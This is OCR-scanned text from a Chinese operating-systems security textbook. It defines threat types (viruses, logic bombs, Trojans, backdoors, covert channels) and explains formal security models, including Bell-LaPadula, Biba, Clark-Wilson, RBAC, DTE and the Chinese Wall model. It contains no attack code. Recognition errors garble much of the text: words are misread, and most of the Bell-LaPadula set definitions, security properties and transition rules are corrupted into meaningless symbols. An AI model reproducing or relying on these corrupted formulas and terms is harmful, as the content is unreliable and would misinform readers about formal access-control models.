(2) 截取 : 未 经 授权 的 用 户 、 程 序 或 计算 机 系统 获得 了 对 某 资源 的 访问 。 这 是 对 机 
密 性 的 威胁 ， 如 在 网 络 中 窃取 数据 及 非法 拷贝 文件 和 程序 。 

G) 算 改 : 未 经 授权 的 用 户 不 仅 获得 了 对 菜 资源 的 访问 ， 而 且 可 以 进行 算 改 。 这 是 
对 完整 性 的 攻击 ， 如 修改 数据 文件 中 的 值 ， 修 改 网 络 中 正在 传送 的 消息 内 容 。 

(4) 伪造 : 未 经 授权 的 用 户 将 伪造 的 对 象 插入 到 系统 中 。 这 是 对 合法 性 的 威胁 ， 如 
非法 用 户 把 伪造 的 消息 加 到 网 络 中 或 向 当前 文件 加 入 记录 。 

按照 安全 威胁 的 表现 形式 来 分 ， 操 作 系统 面临 的 安全 威胁 有 以 下 5 种 : 

(1) 计算 机 病毒 。 计 算 机 病毒 指 的 是 能 够 破坏 数据 或 影响 计算 机 使 有 用， 能够 自我 复 
制 的 一 组 计算 机 指令 或 程序 代码 。 具 有 隐蔽 性 ， 传 染 性 ， 潜 伏 性 和 破坏 性 等 特点 。 病 毒 
的 种 类 多 种 多 样 ， 它 们 利用 系统 的 各 种 漏洞 或 正常 服务 ， 进 行 各 种 形式 的 不 良 行为 。 
型 的 病毒 生命 周期 分 如 下 4 个 阶段 : 潜伏 阶段 ， 传 播 阶段 ， 触 发 阶段 ， 执 行 阶段 。 

(2) 逻辑 炸弹 。 逻 辑 炸弹 是 加 在 现 有 应 用 程序 上 的 程序 。 一 般 迪 辑 炸弹 都 被 添加 在 
被 感染 应 用 程序 的 起 始 处 ， 每 当 该 应 用 程序 运行 时 就 会 运行 逻辑 炸弹 。 它 通常 要 检查 各 
种 条 件 ， 看 是 否 满足 运行 炸弹 的 条 件 。 如 果 风 辑 炸 弹 没有 取得 控制 权 就 将 控制 权 归 还 给 
应 用 程序 ， 逻 辑 炸弹 仍然 安静 地 等 待 。 当 设 定 的 爆炸 条 件 被 满足 后 ， 罗 辑 炸 弹 的 其 余 代 
码 就 会 执行 。 册 辑 炸弹 不 能 复制 自身 ， 不 能 感染 其 他 程序 ， 但 这 些 攻 击 已 经 使 它 成 为 了 
一 种 极 具 破坏 性 的 恶意 代码 类 型 。 罗 辑 炸 弹 具 有 多 种 触发 方式 。 

G) 特洛伊 木马 。 特 洛 伊 木 马 指 的 是 这 样 的 计算 机 程序 ， 表 面 上 执行 合法 功能 ， 实 
际 上 却 完 成 了 用 户 未 曾 料 到 的 非法 功能 。 入 侵 者 开发 这 种 程序 用 来 欺骗 合法 用 户 ， 利 用 
合法 用 户 的 权利 进行 非法 活动 。 

(4) 后 门 。 后 门 指 的 是 嵌 在 操作 系统 中 的 一 段 非法 代码 ， 渗 透 者 可 以 利用 这 段 代 码 
侵入 系统 。 后 门 由 专门 的 命令 激活 ， 一 般 不 容易 发 现 。 而 且 后 门 所 嵌入 的 软件 拥有 渗透 
者 所 没有 的 特权 。 通 常 后 门 设置 在 操作 系统 内 部 ， 而 不 在 应 用 程序 中 ， 后 门 很 像 是 操作 
系统 里 可 供 渗透 的 一 个 缺陷 。 安 装 后 门 就 是 为 了 渗透 。 对 于 操作 系统 中 的 后 门 或 提供 后 
门 的 机 制 ， 彻 底 防 止 的 办 法 是 不 使 用 该 操作 系统 ， 而 采取 自主 开发 的 操作 系统 。 

(5) 隐蔽 通道 。 隐 蔽 通道 可 定义 为 系统 中 不 受 安全 策略 控制 的 、 违 反 安全 策略 、 非 
公开 的 信息 泄露 路 径 。 按 信息 传递 的 方式 和 方法 区 分 ， 隐 项 通道 分 为 隐蔽 存储 通道 和 隐 
项 定时 通道 。 隐 项 存储 通道 在 系统 中 通过 两 个 进程 利用 不 受 安全 策略 控制 的 存储 单元 传 
递 信息 。 隐 蔽 定时 通道 在 系统 中 通过 两 个 进程 利用 一 个 不 受 安全 策略 控制 的 广义 存储 单 
元 传递 信息 。 判 别 一 个 隐蔽 通道 是 否 是 隐蔽 定时 通道 , 关键 是 看 它 有 没有 一 个 实时 时 钟 、 
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间隔 定时 器 或 其 他 计时 装置 ， 不 需要 时 钟 或 定时 器 的 隐蔽 通道 是 隐蔽 存储 通道 。 

以 上 几 种 威胁 不 一 定 是 独立 存在 的 ， 常 常 可 以 结合 起 来 使 用 。 例 如 在 利用 系统 漏洞 
入 侵 系 统 后 可 以 放置 计算 机 病毒 ， 特 洛 伊 木 马 ， 或 在 特洛伊 木马 中 使 用 后 门 程序 ， 或 通 
过 计算 机 病毒 造成 拒绝 服务 。 这 就 要 求 我 们 不 能 分 立 对 付 这 些 威胁 ， 而 应 该 寻找 这 些 威 
胁 形成 的 途径 ， 在 系统 中 加 以 控制 ， 通 过 切断 这 个 途径 ， 来 增强 系统 的 安全 性 。 

解决 病毒 威胁 的 最 理想 的 办 法 是 预防 ， 不 要 让 病毒 侵入 到 系统 中 。 尽 管 预防 能 够 减 
少 病毒 成 功 攻击 的 数目 ， 但 这 个 目标 一 般 来 说 是 不 太 可 能 达到 的 。 另 一 个 较 好 的 方法 就 
是 能 够 做 到 如 下 几 点 : 检测 ， 一 旦 已 经 发 生 感染 ， 就 要 确定 它 的 发 生 并 定位 病毒 ;识别 ， 
当 检 测 取得 成 功 后 ， 就 要 识别 并 清除 感染 程序 中 的 特定 病毒 ， 清 除 ， 一 旦 识别 出 特定 病 
毒 ， 根 除 病毒 并 恢复 程序 原来 的 状态 。 

对 于 其 他 表现 形式 的 安全 威胁 ， 可 通过 入 侵 检测 技术 ， 即 对 行为 、 安 全 日 志 或 审计 
数据 或 其 他 网 络 上 可 以 获得 的 信息 进行 分 析 操 作 ， 确 认 系统 是 否 受 到 安全 威胁 。 


4.2.3 ”安全 模型 


JP.Anderson 等 人 指出 ， 要 开发 安全 系统 首先 必须 建立 系统 的 安全 模型 。 安 全 模型 
给 出 安全 系统 的 形式 化 定义 ， 正 确 地 综合 系统 的 各 类 因素 。 这 些 因 素 包括 系统 的 使 用 方 
式 、 使 用 环境 类 型 、 授 权 的 定义 、 共 享 的 客体 〈 系 统 资源 ) 、 共 享 的 类 型 和 受 控 共享 思 
想 等 。 这 些 因素 应 构成 安全 系统 的 形式 化 抽象 描述 ， 使 得 系统 可 以 被 证 明 是 完整 的 、 反 
映 真实 环境 的 、 逻 辑 上 能 够 实现 的 程序 且 受 控 执行 的 。 完 成 安全 系统 的 建 模 之 后 ， 再 进 
行 安全 核 的 设计 与 实现 。 这 一 原则 表明 ， 要 开发 安全 操作 系统 必须 完成 两 大 任务 ， 即 访 
问 控制 框架 的 建立 和 安全 模型 的 建立 。 访 问 控制 框架 有 基于 政策 描述 语言 的 FAM 
(Flexible Authorization Manager) 和 企业 间 多 协调 框架 、 基 于 安全 属性 的 GFAC 框架 、 
基于 统一 模型 的 数据 库 FMP, RBAC, Flask 框架 。 安 全 模型 包括 状态 机 模型 、 信 息 流 模 
型 、 无 干扰 模型 、 不 可 推断 模型 、 完 整 性 模型 等 类 型 。 

(1) 状态 机 模型 (State Machine Model) 

用 状态 语言 将 安全 系统 描绘 成 抽象 的 状态 机 ， 用 状态 变量 表示 系统 的 状态 ， 用 转换 
规则 描述 变量 变化 的 过 程 。 状 态 机 模型 用 于 描述 通用 操作 系统 的 所 有 状态 变量 几乎 是 不 
可 能 的 ， 通 常 只 能 描述 安全 操作 系统 中 若干 与 安全 相关 的 主要 状态 变量 。 访 问 控制 矩阵 
(Access Control Matrix) 是 一 个 典型 的 状态 机 模型 。 

(2) 信息 流 模型 (Information Flow Model) 

信息 流 模 型 用 于 描述 系统 中 客体 间 信 息 传输 的 安全 需求 ， 根 据 客体 的 安全 属性 决定 
主体 对 它 的 存 取 操作 是 否 可 行 。 信 息 流 模型 不 是 检查 主体 对 客体 的 存 取 ， 而 是 试图 控制 
从 一 个 客体 到 另 一 个 客体 的 信息 传输 过 程 。 它 根据 两 个 客体 的 安全 属性 决定 存 取 操 作 是 
否 可 以 进行 。 信 息 流 模 型 可 用 于 寻找 隐蔽 通道 , 因此 依赖 信息 流 模型 的 系统 分 析 方 法 (又 
称 为 信息 流 分 析 ) 通常 与 隐蔽 通道 分 析 等 价 。 
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(3) 无 干扰 模型 (Non-Interference Model) 

无 干扰 模型 将 系统 的 安全 需求 描述 成 一 系列 主体 间 操 作 互 不 影响 的 断言 ， 要 求 在 不 
同 存储 域 中 操作 的 主体 能 够 防止 由 于 违反 系统 的 安全 性 质 导 致 的 相互 间 的 影响 ， 如 要 求 
高 安全 级 的 操作 不 干扰 低 安 全 级 主体 的 活动 。 

(4) 不 可 推断 模型 (Non-Deducibility Model) 

这 个 模型 提出 了 不 可 推断 性 的 概念 ， 要 求 低 安全 级 用 户 不 能 推断 出 高 安全 级 用 户 的 
行为 。 

(5) 完整 性 模型 (Integrity Model) 

目前 公认 的 两 个 完整 性 模型 是 Biba 模型 和 Clark-Wilson 模型 .Biba 模型 通过 完整 级 
CIntegrity Level) 的 概念 ， 控 制 主体 “ 写 ” 访 问 操作 的 客体 范围 。Clark-Wilson 模型 针对 
完整 性 问题 ， 对 系统 进行 功能 分 隔 和 管理 。 

安全 模型 的 特点 是 简单 、 抽 象 、 容 易 理 解 ， 精 确 、 无 歧义 ， 只 涉及 安全 性 质 ， 安 全 
策略 表现 明显 。 

现 有 的 安全 模型 大 多 采用 状态 机 模型 。 开 发 一 个 状态 机 安全 模型 包含 确定 模型 的 要 
素 〈 变 量 、 函 数 、 规 则 等 ) 和 安全 初始 状态 。 开 发 一 个 状态 机 模型 需要 采用 如 下 特定 的 
步骤 : 定义 安全 相关 的 状态 变量 ， 定 义 安全 状态 的 条 件 ， 定 义 状态 转换 函数 ， 检 验 函 数 
是 否 维持 了 安全 状态 ;定义 初始 状态 ;依据 安全 状态 的 定义 ， 证 明 初 始 状态 安全 。 
4.2.3.1 BLP 模型 

Bell-LaPadula 模型 (简称 BLP 模型 ) 是 D.Elliott Bell 和 Leonard J.LaPadula 于 1973 
年 提出 的 对 应 于 军事 类 型 安全 密级 分 类 的 计算 机 操作 系统 模型 。BLP 模型 是 最 早 的 一 种 
计算 机 多 级 安全 模型 ， 也 是 受到 公认 最 著名 的 状态 机 模型 。 

BLP 模型 采用 线性 排列 安全 许可 的 分 类 形式 来 保证 信息 的 保密 性 。 每 个 主体 都 有 一 
个 安全 许可 级 别 ， 等 级 越 高 ， 可 访问 的 信息 就 越 敏 感 。 每 个 客体 也 都 有 个 安全 密级 ， 密 
级 越 高 ， 客 体 信息 越 敏感 。 

BLP 模型 的 基本 原理 : 系统 由 主体 (进程 》 和 客体 (数据 、 文 件 ) 组 成 ， 主 体 对 客 
体 的 访问 分 为 只 读 Cr) 、 读 写 Cw) 、 只 写 (a) 、 执 行 (e) 、 控 制 Co) 几 种 访问 模式 ， 
控制 Co) 指 主体 授予 或 撤消 另 一 主体 对 某 一 客体 访问 权限 的 能 

1. BLP 模型 的 基本 元 素 

BLP 模型 定义 了 如 下 的 集合 : 

主体 集合 5={s1,s2…,sn}， 主 体 : 用 户 或 代表 用 户 的 进程 ， 能 使 信息 流动 的 实体 。 

客体 集合 0={01,02,…,om}， 客 体 : 文件 、 程 序 、 内 存 段 等 。 

主体 或 客体 的 密级 C={c1,c2,…,cyg}， 元 素 之 间 呈 全 序 关 系 ，c1<c2<*…<cg。 

部 门 或 类 别 的 集合 K= {le hehe} o 

访问 属性 集 4={rweac}， 其 中 ，r: Aik; w: 读 写 ; e: HT: a: 添加 CAS); 
c: 控制 。 
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请 求 元 素 集 R={g,r,c,d}， 其 中 ，g: get (得 到 ) ，give ORT) ; r: release (释放 ) ， 
rescind (JAHH) ; c: change (改变 客体 的 安全 级 ) ，create〈 创 建 客 体 ) ; d: delete H 
除 客体 ) 。 

FER (结果 集 ) D={yes.no,error,?}, HP, yes: 请 求 被 执行 ，no: 请 求 被 拒绝 ; 
eror: 系统 出 错 ， 有 多 个 规则 适合 于 这 一 请 求 ，?: 请 求 出 错 ， 规 则 不 适用 于 这 一 请 求 。 

访问 矩阵 集 y={M M2 Mp} HERIR Mi 是 一 nXm WIERE, Mi 的 元 素 Myc4。 

F=COXC°X (Py XP, 其中， 

C=: S 一 C}， 太 给 出 每 一 主体 的 密级 
C=fili: O 一 C}, 太 给 出 每 一 客体 的 密级 ; 
POEH: SSP 有 户 给 出 每 一 主体 的 部 门 集 ( 即 范畴 ); 
POEN O 一 PR}， 有 给 出 每 一 客体 的 部 门 集 ( 即 范畴 ) 。 

IP, PEER KIER (Px=2*) 。 

F 的 元 素 记 作 SARAD ABERA BE EA ARATE, BE 
密级 和 部 门 集 ， 即 主体 的 许可 证 级 AA) ， 客 体 的 安全 级 GA) 。 

2. BLP 模型 系统 状态 

天 Psexox0XAX 玉 是 状态 的 集合 , 状态 VOM PAT = tA ean, 其 中 bc(SX OX A), 
是 当前 访问 集 。M 是 访问 矩阵 ， 它 的 第 TTT, Bj 列 的 元 素 Myc4 表示 在 当前 状态 下 ， 
主体 5; 对 客体 0; 所 拥有 的 访问 权限 。 户 (iff)， 其 中 ，fi(s) 和 f(s) 分 别 表示 主体 5 的 
密级 和 部 门 集 ，f(o) 和 .fh(o) 分 别 表示 客体 O 的 密级 和 部 门 集 。 

SEF: 表示 访问 类 函数 ， 记 作 KH he for fed 。 其 中 : 大 表示 主体 的 安全 级 函数 ( 包 
括 主体 的 密级 i(s) 和 范畴 f(s)); 表示 客体 当前 的 安全 级 函数 (包括 客体 的 密级 (0o) 和 
范畴 有 (0)) o 

(3) BLP 模型 安全 特性 

名 简单 安全 性 (simple-security property): 状态 v= (b, M, 贱 满足 简单 安全 性 〈 记 
为 ss-property)， 当 且 仅 当 对 所 有 的 sES=> [(oEb(s:r, WERO] ， 

其 中 : 符号 > 表示 前 者 支配 后 者 ， 即 (hi(s) 之 六 oo)，AG) 三 Aio)): 

b(s: xis Xo ty An) BEAR b 中 主体 s 对 其 具有 访问 权限 (1 Sin) HAAR 

简单 安全 性 一 一 不 可 上 读 。 

@ *- 特 性 (*-property): SÆ S 的 一 个 子 集 ， 状 态 vb, M, fe 如 满足 相对 于 8 的 +- 
特性 ( 记 为 *-property rel S’ )， 当 且 仅 当 对 所 有 的 

(oeb(s:a) > (f (0) > f(s) 

sE S'=>4(0Eb(s:w)) > (f, (0) = f,(5)) 

(oe b(s:r))> (f(s) > f,(0)) , 


+ 特性 不 可 下 写 。 
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@ 自主 安全 性 (discretionary-security property) : 状态 v= (b, M, 万 H) 满足 自主 
安全 性 〈 记 为 ds-property) ， 当 上 且 仅 当 对 所 有 的 (si, oj, x) €b=>xE Mjo 
@ 兼容 性 公理 (Compatibility) : 状态 v= (b, M, f H) 满足 兼容 性 ， 当 且 仅 当 
对 所 有 的 oeEO， 有 oo1EH(o) => f(01)>f(0)- 
4. BLP 模型 状态 转换 规则 
BLP 状态 转换 规则 p 定义 为 函数 p: RXV>DXV， 对 规则 的 解释 为 给 定 一 个 请 求 和 
一 个 状态 ， 规 则 p 决定 系统 产生 的 一 个 响应 和 下 一 个 状态 。 
其 中 : R 为 请 求 集 ; VARA: DD 为 判定 集 {yes, no, error, ?} o 
p 规定 对 于 给 定 的 一 个 状态 和 一 个 请 求 ， 系 统 产生 一 个 判定 和 下 一 个 状态 ， 只 有 当 
D 的 取 值 为 “yes” 时 , 请 求 才 被 执行 ,状态 才 发 生 转 换 。BLP 模型 定义 了 十 条 基本 规则 。 
5. BLP 模型 系统 的 定义 
®© RXDXVX V={(rg,dn,v*,v) |rrER, dnED, vt vE V} 
即 ， 任 意 一 个 请 求 ， 任 意 一 个 结果 (判定 ) 和 任意 两 个 状态 都 可 组 成 一 个 上 述 的 有 
序 4 元 组 ， 这 些 有 序 4 元 组 便 构成 集合 RXDXVXV。 
@ 设 w={P1,P…,P,} 是 一 组 规则 的 集合 ， 定 义 Wott RXDXVXV 的 子 集 : 
L (rk? vv) € Wo), iff RES i 1<i<s, Pi(re.v)=(?,v)0 
Il. (rg,error,v,v)€ Wo), iff 存在 il, i2, 1Sil, i2<s, WAPI verv 有 
Palrev)#(2,v*) H. Pitre vAC.V*) 0 
IIL. (rpdmv*,v)E Ww)，dm 关 ?，dm 关 error， 认 存在 唯一 的 i，1<is， 使 得 对 某 个 
?和 任意 的 v** EV, Pilrpv)A(?2.v**), Prr V= (dm v*)o 
以 上 定义 说 明 MOREE RXDXVXV 中 一 部 分 四 元 组 ， 或 某 些 特定 的 四 元 组 。 
若 某 (ridm,v*,v)e Ww)， 则 说 明 该 四 元 组 一 定 满足 上 述 定 义 中 (3 条 ) 的 某 一 条 ， 亦 即 意 
味 着 在 状态 v 下 , 发 出 某 请 求 六 后 ,按照 某 条 规则 , 其 结果 为 dm 状态 v 转换 成 状态 v*. 
因此 Ww) 是 由 ww 中 的 一 组 规则 所 定义 的 有 序 四 元 组 所 组 成 。 
@ XX YXZfaxyDKexyeYzeZ}, HH, 
x=xmw2…xe… 是 请 求 序列 ， 了 是 请 求 序列 集 ; 
J 王 702…32… 是 结果 序列 ， 了 是 结果 序列 集 ; 
到 2z122…2f… 是 状态 序列 ，Z 是 状态 序列 集 。 
任意 一 个 请 求 序列 ， 任 意 一 个 结果 序列 和 任意 一 个 状态 序列 均 可 组 成 一 个 有 序 三 元 
组 ， XXYXZ 即 由 所 有 这 样 的 有 序 三 元 组 所 构成 。 
@ 系统 表示 为 (R,D,W(@),z0)， 定 义 为 : 
(R,D,W(w),zo)CXXYXZ， 只 含有 其 中 一 部 分 有 序 三 元 组 ，XXYXZ 中 的 有 序 三 元 
Hy) E E (RD,Wo)zo), iff X — A tET, Eyza) EW). 
20 是 系统 的 初始 状态 ， 通 常 表示 为 (po.MJ。 


令 xare EW RKE]; 
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J=ywy2…ye*… 是 结果 序列 ; 
元 212…2… 是 状态 序列 。 

若 (xy,z)E 站 (R,D,W(@),z0o)， 则 意味 着 对 于 所 有 的 tET, Eyez) E Wo), ME 
o 所 规定 的 操作 规则 。 

因此 系统 二 (CR.D, 了 Fo),zo) 是 一 个 状态 机 ， 它 从 一 个 特定 的 初始 状态 z 开始， 接受 用 
户 的 一 系列 请 求 ， 按 照 《ew) 的 规则 给 出 相应 的 结果 ,并 进行 相应 的 状态 转换 ,符合 上 述 
条 件 的 所 有 可 能 的 (ry,z) 组 成 系统 光 。 系 统 R 就 是 由 所 有 这 些 有 序 三 元 组 (xy,z) 所 
组 成 。 

从 初始 状态 zo 出发， 任何 一 个 请 求 序列 均 可 导致 出 一 结果 序列 和 状态 序列 ， 引 起 一 
系列 的 状态 转换 。 

6. BLP 模型 系统 安全 的 定义 

安全 状态 : 一 个 状态 w=(b,M/)EV， 若 它 满足 自主 安全 性 ， 简 单 安全 性 和 *- 特 性 ， 
那么 这 个 状态 就 是 安全 的 。 

安全 状态 序列 : WZEZ 是 一 状态 序列 ， 若 对 于 每 一 个 feET，zt 都 是 安全 状态 ， 则 z 
是 安全 状态 序列 。 

系统 的 一 次 安全 出 现 ，(xy,z)E 二 (R,D,W(@),zo) 称 为 系统 的 一 次 出 现 。 

若 (xwy,z) 是 系统 的 一 次 出 现 , 且 z 是 一 安全 状态 序列 , 则 称 (x,y,z) 是 系统 >(R,D,W(@w),z0) 
的 一 次 安全 出 现 。 

安全 系统 ， 若 系统 元 (R,D,W(@),zo) 的 每 次 出 现 都 是 安全 的 ， 则 称 该 系统 是 一 安全 
系统 。 

7. BLP 模型 中 的 有 关 安 全 的 结论 

BLP 模型 中 证 明了 : 

@ 十 条 规则 都 是 安全 性 保持 的 ( 即 车 v 是 安全 状态 , 则 经 过 这 十 条 规则 转换 后 的 状 
AS v# 也 一 定 是 安全 状态 ) 。 

© E zo 是 安全 状态 ，w 是 一 组 安全 性 保持 的 规则 ， 则 系统 Z(R,.D,fow),zo) 是 安 
全 的 。 

说 明 BLP 模型 所 描述 的 系统 是 一 个 安全 的 系统 。 

8. 对 BLP 安全 模型 的 评价 

BLP 模型 是 最 早 的 一 种 安全 模型 ， 也 是 最 有 名 的 多 级 安全 策略 模型 。 它 给 出 了 军事 
安全 策略 的 一 种 数学 描述 ， 用 计算 机 可 实现 的 方式 定义 。 它 已 为 许多 操作 系统 所 使 用 。 

BLP 模型 是 一 个 严格 形式 化 的 模型 , 并 给 出 了 形式 化 的 证 明 ; 是 一 个 很 安全 的 模型 ， 
既 有 自主 访问 控制 ， 又 有 强制 访问 控制 ， 控 制 信息 只 能 由 低 向 高 流动 ， 能 满足 军事 部 门 
等 一 类 对 数据 保密 性 要 求 特 别 高 的 机 构 的 需求 。 

BLP 模 型 中 当 低 安全 级 的 信息 向 高 安全 级 流动 , 可 能 破坏 高 安全 客体 中 数据 完整 性 ， 
被 病毒 和 黑客 利用 。 只 要 信息 由 低 向 高 流动 即 合 法 (高 读 低 ) ， 不 管 工 作 是 否 有 和 需求， 
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这 不 符合 最 小 特权 原则 。 高 级 别 的 信息 大 多 是 由 低级 别 的 信息 通过 组 装 而 成 的 ， 要 解决 
推理 控制 的 问题 。 另 外 上 级 对 下 级 发 文 受到 限制 ， 部 门 之 间 信 息 的 横向 流动 被 禁止 ， 缺 
乏 灵 活 、 安 全 的 授权 机 制 。 

4.2.3.2 ”其 他 安全 模型 

1. Biba 模型 

BLP 模型 通过 防止 非 授权 信息 的 扩散 保证 系统 的 安全 ， 但 它 不 能 防止 非 授权 修改 系 
统 信息 。 于 是 Biba 等 人 在 1977 年 提出 了 第 一 个 完整 性 安全 模型 一 Biba 模型 ， 其 主要 
应 用 类 似 BLP 模型 的 规则 来 保护 信息 的 完整 性 。 Biba 模型 也 是 基于 主体 、 客 体 以 及 它们 
的 级 别 的 概念 的 。 模 型 中 主体 和 客体 的 概念 与 BLP 模型 相同 ,对 系统 中 的 每 个 主体 和 每 
个 客体 均 分 配 一 个 完整 性 等 级 ， 等 级 越 高 ， 可 靠 性 越 高 。 

Biba 模型 提出 三 种 策略 : 下 限 标记 策略 ， 环 策略 和 严格 完整 性 策略 。 

下 限 标记 策略 : 当主 体 访问 一 个 客体 时 ， 将 主体 的 完整 性 等 级 变 为 该 主体 和 该 客体 
完整 性 等 级 中 较 低 的 那个 等 级 。 该 策略 包括 : 对 于 主体 的 下 限 标记 策略 ， 对 于 客体 的 下 
限 标记 策略 ， 下 限 标记 完整 审计 策略 。 

对 于 主体 的 下 限 标记 策略 为 : 主体 S 可 以 对 给 定 客体 O 进行 写 操作 ， 当 且 仅 当 S 的 
完整 性 等 级 支配 O 的 完整 性 等 级 ; 主体 S 可 以 对 任何 客体 O 进行 读 取 操 作 ， 当 完成 读 
取 操 作 之 后 ,主体 S 的 完整 性 被 置 为 执行 读 取 操作 之 前 S 和 O 的 完整 性 等 级 的 最 小 上 界 ; 
主体 Sy 可 以 执行 另 一 个 主体 SCG So 通信 )， 当 且 仅 当 Si 的 完整 性 等 级 支配 S 的 完整 性 
等 级 。 

对 于 客体 的 下 限 标记 策略 :主体 S 能 够 对 具有 任何 完整 性 等 级 的 客体 O 进行 写 操作 ， 
“4S 执行 完 对 O 的 写 操作 之 后 ， 客 体 O 的 完整 性 等 级 被 置 为 执行 写 操作 之 前 S 和 0 的 
完整 性 等 级 的 最 大 下 界 。 

下 限 标记 完整 审计 策略 : 主体 S 能 够 对 具有 任何 完整 性 等 级 的 客体 O 进行 写 操作 ， 
WMR S 的 完整 性 等 级 低 于 O 的 完整 性 等 级 或 两 者 不 可 比 , 该 违反 安全 的 操作 将 被 记录 在 
审计 记录 中 。 

环 策略 :主体 和 客体 的 完整 性 等 级 在 执行 操作 的 前 后 是 固定 不 变 的 。 

环 策略 规则 如 下 : 

© 主体 S 可 以 对 给 定 客体 O 进行 写 操作 ， 当 且 仅 当 S 的 完整 性 等 级 支配 O 的 完整 
性 等 级 。 

© 主体 S1 可 以 执行 另 一 个 主体 S (与 ;通信 ) ， 当 且 仅 当 S$; 的 完整 性 等 级 支配 
Si 的 完整 性 等 级 。 

© EW S 可 以 对 具有 任何 完整 性 等 级 的 客体 O 进行 读 取 操 作 。 

严格 完整 性 策略 是 BLP 模型 的 对 偶 。 

严格 完整 性 策略 的 规则 如 下 : 

© 完整 性 *- 属 性 ， 主体 S 可 以 对 客体 O 进行 写 操作 ， 当 且 仅 当 S 的 完整 性 等 级 支 
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配 客体 O 的 完整 性 等 级 。 

© 援引 规则 主体 Si 可 以 执行 另 一 个 主体 S C5 S: 通信) ， 当 且 仅 当 Si 的 完整 
性 等 级 支配 S: 的 完整 性 等 级 。 

© 简单 完整 性 条 件 : 主体 S 可 以 对 客体 O 进行 读 取 操 作 ， 当 且 仅 当 O 的 完整 性 等 
级 支配 S 的 完整 性 等 级 。 

2. Clark-Wilson 模型 

在 商务 环境 中 ，1987 年 David Clark 和 David Wilson 所 提出 的 完整 性 模型 具有 里 程 
碑 的 意义 ， 它 是 完整 意义 上 的 完整 性 目标 、 策 略 和 机 制 的 起 源 。 为 了 体现 用 户 完整 性 ， 
他 们 提出 了 职责 隔离 (Separation of Duty) 目标 ;为 了 保证 数据 完整 性 ， 他 们 提出 了 应 
用 相关 的 完整 性 验证 进程 ， 为 了 建立 过 程 完整 性 ， 他 们 定义 了 对 于 变换 过 程 的 应 用 相关 
验证 ; 为 了 约束 用 户 、 进 程 和 数据 之 间 的 关联 ， 他 们 使 用 了 一 个 三 元 组 结构 。 

Clark-Wilson 模型 的 核心 在 于 以 良 构 事 务 (Well-Formal Transaction) 和 任务 分 离 机 
制 来 保证 数据 的 一 致 性 和 事务 处 理 的 完整 性 。 良 构 事 务 处 理 机 制 是 指 用 户 不 能 任意 处 理 
数据 ， 而 必须 以 确保 数据 完整 性 的 受 限 方式 来 对 数据 进行 处 理 ， 任 务 分 离 机 制 是 指 将 任 
务 分 成 多 个 子 集 ， 不 同 的 子 集 由 不 同 的 人 来 完成 。 其 最 基本 规则 是 任何 一 个 验证 行为 正 
确 性 的 人 不 能 同时 也 是 被 验证 行为 的 执行 人 。 

3. RBAC 模型 

基于 角色 的 存 取 控 制 (Role-Based Access Control, RBAC) 模型 主要 用 于 管理 特权 ， 
在 基于 权能 的 访问 控制 中 实现 职责 隔离 及 极 小 特权 原理 。RBAC 包含 以 下 基本 要 素 : 用 
PFR (Users)， 主 体 进程 集 (Subjects)， 角 色 集 (Roles)， 操 作 集 (Operations)， 操 作对 
象 集 (Objects)， 操 作 集 和 操作 对 象 集 形成 一 个 特权 集 (Privileges); 用 户 与 主体 进程 的 
KA (subject_user), 用 户 与 角色 的 关系 Cuser role), 操作 与 角色 的 关系 (role_operations )， 
操作 与 操作 对 象 的 关系 〈operation_object)。 

通常 subject_user 是 多 对 一 的 关系 ， 它 把 多 个 主体 进程 映射 到 一 个 用 户 。user role 
可 以 是 多 对 多 的 关系 。role_operations 是 一 对 多 的 关系 ， 它 把 一 个 角色 映射 到 多 个 操作 ， 
是 角色 被 授权 使 用 的 操作 的 集合 。operation_object 是 一 对 多 的 关系 ， 它 把 一 个 操作 映射 
到 多 个 操作 对 象 ， 是 操作 被 授权 作用 的 操作 对 象 集 。 

4. DTE 模型 

域 类 型 增强 (Domain and Type Enforcement, DTE) 模型 是 由 O’Brien and Rogers 于 
1991 年 提出 的 一 种 访问 控制 技术 。 它 通过 赋予 文件 不 同 的 类 型 (Type)、 赋 予 进 程 不 同 
的 域 (Domain) 来 进行 访问 控制 ， 从 一 个 域 访问 其 他 的 域 以 及 从 一 个 域 访 问 不 同 的 类 型 
都 要 通过 DTE 策略 的 控制 。 

近年 来 DTE 模型 作为 实现 信息 完整 性 保护 的 模型 。 该 模型 定义 了 多 个 域 (Domain) 
FIKH (Type), 并 将 系统 中 的 主体 分 配 到 不 同 的 域 中 , 不 同 的 客体 分 配 到 不 同 的 类 型 中 ， 
通过 定义 不 同 的 域 对 不 同 的 类 型 的 访问 权限 ， 以 及 主体 在 不 同 的 域 中 进行 转换 的 规则 来 
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达到 保护 信息 完整 性 的 目的 。 

DTE 使 域 和 每 一 个 正在 运行 的 进程 相关 联 ， 类 型 和 每 一 个 对 象 相 关联 。 如 果 一 个 域 
不 能 以 某 种 访问 模式 访问 某 个 类 型 ， 则 这 个 域 的 进程 不 能 以 该 种 访问 模式 去 访问 那个 类 
型 的 对 象 。 当 一 个 进程 试图 访问 一 个 文件 时 ，DTE 系统 的 内 核 在 做 标准 的 系统 许可 检查 
之 前 , 先 做 DTE 许可 检查 。 如 果 当 前 域 拥 有 被 访问 文件 所 属 的 类 型 所 要 求 的 访问 权 , A 
么 这 个 访问 得 以 批准 ， 继 续 执 行 正 常 的 系统 检查 。 

5. 中 国 墙 模 型 

1989 年 Brewer 和 Nash 提出 的 兼顾 保密 性 和 完整 性 的 安全 模型 ， 又 称 BN 模型 。 主 
要 用 来 解决 商业 中 的 利益 冲突 问题 ， 目 标 是 防止 利益 冲突 的 发 生 。 中 国 墙 模型 对 数据 的 
访问 控制 是 根据 主体 已 经 具有 的 访问 权力 来 确定 是 否 可 以 访问 当前 数据 。 

模型 的 基本 思想 是 只 允许 主体 访问 与 其 所 拥有 的 信息 没有 利益 冲突 的 数据 集 内 的 
信息 。 

中 国 墙 的 含义 是 :最初 ， 一 个 主体 可 以 自由 选择 访问 任何 客体 ， 一旦 主体 访问 了 某 
个 企业 数据 集 内 的 客体 ， 它 将 不 能 再 访问 这 个 利益 冲突 中 其 他 企业 数据 集 内 的 客体 。 

中 国 墙 模型 的 简单 安全 属性 : 主体 S 可 以 读 取 客 体 O, 当 且 仅 当 满足 以 下 任 一 条 件 ; 

O 存在 一 个 S 曾经 访问 过 的 客体 0，”， 并 且 0O” 和 0O 处 于 同一 企业 数据 集中 。 

@ 对 于 $ 访问 过 的 所 有 0”， 都 有 0” 和 0 不 在 一 个 利益 冲突 类 中 。 

